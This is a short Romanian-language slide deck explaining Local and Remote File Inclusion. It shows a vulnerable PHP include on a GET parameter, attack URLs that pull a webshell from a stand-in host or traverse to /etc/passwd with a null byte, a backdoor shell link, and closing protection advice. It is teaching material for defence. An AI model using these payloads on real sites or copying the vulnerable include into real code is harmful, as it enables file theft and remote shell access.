LFI & RFI

  • Local File Inclusion
  • Remote File Inclusion
  • Vulnerabilitate web (21%)
  • Includere fisiere prin parametri
  • Accesare neautorizata de fisiere
  • Executare cod malitios pe host

Interogare vulnerabila

http://www.site.com/pagina/vulnerabila?include=fisier
  • fisier - ii este inclus continutul in pagina
  • un model gresit
  • nu se fac suficiente verificari

Interogare vulnerabila

<?php
   if ( isset( $_GET['language'] ) ) {
      include( $_GET['language'] . '.php' );
   }
?>
  • /vulnerable.php?language=FISIER
<form method="get">
   <select name="language">
      <option value="english">English</option>
      <option value="french">French</option>
      ...
   </select>
   <input type="submit">
</form>

Interogare vulnerabila

  • /vulnerable.php?language=FISIER
  • /vulnerable.php?language=http://evil.example.com/webshell.txt?
  • /vulnerable.php?language=C:\\ftp\\upload\\exploit
  • /vulnerable.php?language=C:\\notes.txt%00
  • /vulnerable.php?language=../../../../../etc/passwd%00

Citire neautorizata

  • /etc/passwd (%00)
  • web server cu acces de root
  • /etc/shadow
  • /var/log
  • fisiere exploit locale

Executie shell

  • includere exploit remote
  • http://www.hacker.com/backdoor_shell.php (%00)
  • R57 shell

Exemplu artificial

  • server local in Python
  • vulnerabilitate expusa in mod voit
  • exemplu in PHP

Alte limbaje

<jsp:include page=”<%=(String)
request.getParmeter(“ParamName”)%>”>

Protectie

  • sanitizare parametri/input
    • GET/POST
    • query
    • cookies
    • headers
  • validari client si server side
  • whitelist pe extensie si format (PDF, DOC, JPG)
  • verificari dimensiune

Sfarsit

Multumim!

LFI & RFI

By Cosmin Poieana

Made with Slides.com

LFI & RFI

Vulnerabilitate web: includere fisiere locale si/sau remote.

  • 515

More from Cosmin Poieana